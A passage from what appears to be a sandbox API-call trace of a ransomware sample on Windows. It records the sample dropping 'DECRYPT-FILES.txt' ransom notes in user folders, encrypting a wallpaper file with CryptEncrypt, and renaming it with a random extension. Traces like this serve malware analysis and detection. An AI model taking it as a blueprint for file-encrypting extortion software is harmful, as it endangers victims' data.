returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0088.279] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\jkbimi8.tmp") returned 73 [0088.279] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\templates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.279] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 61 [0088.279] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.279] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt") returned 79 [0088.279] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.280] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.281] CloseHandle (hObject=0x444) returned 1 [0088.281] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 61 [0088.281] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0088.281] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.281] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.281] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.281] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0d14f80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.281] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0088.281] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\jkbimi8.tmp" [0088.281] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.281] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\templates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.282] CloseHandle (hObject=0x0) returned 0 [0088.282] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.282] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0d14f80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.282] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.282] CloseHandle (hObject=0x440) returned 1 [0088.282] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0088.282] lstrcmpW (lpString1="Themes", lpString2=".") returned 1 [0088.282] lstrcmpW (lpString1="Themes", lpString2="..") returned 1 [0088.282] lstrcatW (in: lpString1="Themes", lpString2="\\" | out: lpString1="Themes\\") returned="Themes\\" [0088.282] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Themes\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0088.282] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\jkbimi8.tmp") returned 70 [0088.282] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.283] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 58 [0088.283] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.283] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt") returned 76 [0088.283] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.284] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.285] CloseHandle (hObject=0x444) returned 1 [0088.285] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 58 [0088.285] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0088.285] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.285] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.285] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.285] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0d14f80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.285] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0088.285] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\jkbimi8.tmp" [0088.285] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.286] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.286] CloseHandle (hObject=0x0) returned 0 [0088.286] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.286] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff982e02, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x9b944, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 1 [0088.286] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0088.286] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="TranscodedWallpaper.jpg" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" [0088.286] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.286] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.287] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=637252) returned 1 [0088.287] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.287] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x37e0000 [0088.288] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.288] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.289] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.290] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.290] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.311] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.312] UnmapViewOfFile (lpBaseAddress=0x37e0000) returned 1 [0088.317] CloseHandle (hObject=0x44c) returned 1 [0088.317] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.317] WriteFile (in: hFile=0x448, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.318] CloseHandle (hObject=0x0) returned 0 [0088.318] CloseHandle (hObject=0x448) returned 1 [0088.318] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.319] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.319] GetTickCount () returned 0x114e84d [0088.319] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.319] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.319] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.319] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.320] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.320] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg") returned 81 [0088.320] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.kC6F9vy") returned 89 [0088.320] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.kC6F9vy" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.kc6f9vy"), dwFlags=0x0) returned 1 [0088.321] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.321] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.321] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.321] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff982e02, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x9b944, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 0 [0088.321] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.321] CloseHandle (hObject=0x440) returned 1 [0088.322] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes\\", cAlternateFileName="")) returned 0 [0088.322] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0088.322] CloseHandle (hObject=0x438) returned 1 [0088.322] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows\\", cAlternateFileName="")) returned 0 [0088.322] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0088.322] CloseHandle (hObject=0x428) returned 1 [0088.322] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft\\", cAlternateFileName="MICROS~1")) returned 0 [0088.322] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0088.322] CloseHandle (hObject=0x410) returned 1 [0088.322] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="")) returned 0 [0088.322] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0088.322] CloseHandle (hObject=0x430) returned 1 [0088.322] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0088.322] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0088.323] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0088.323] lstrcatW (in: lpString1="Application Data", lpString2="\\" | out: lpString1="Application Data\\") returned="Application Data\\" [0088.323] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0088.323] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Application Data\\\\jkbimi8.tmp") returned 46 [0088.323] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\application data\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.323] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0088.323] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.323] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Application Data\\\\DECRYPT-FILES.txt") returned 52 [0088.323] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\application data\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.323] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0088.323] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Application Data\\*") returned="C:\\Users\\Default\\Application Data\\*" [0088.323] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0088.324] CloseHandle (hObject=0x430) returned 1 [0088.324] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0088.324] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0088.324] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0088.324] lstrcatW (in: lpString1="Contacts", lpString2="\\" | out: lpString1="Contacts\\") returned="Contacts\\" [0088.324] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0088.324] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Contacts\\\\jkbimi8.tmp") returned 38 [0088.324] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\contacts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.325] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\") returned 26 [0088.325] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.325] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Contacts\\\\DECRYPT-FILES.txt") returned 44 [0088.325] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\contacts\\decrypt-files.txt"), 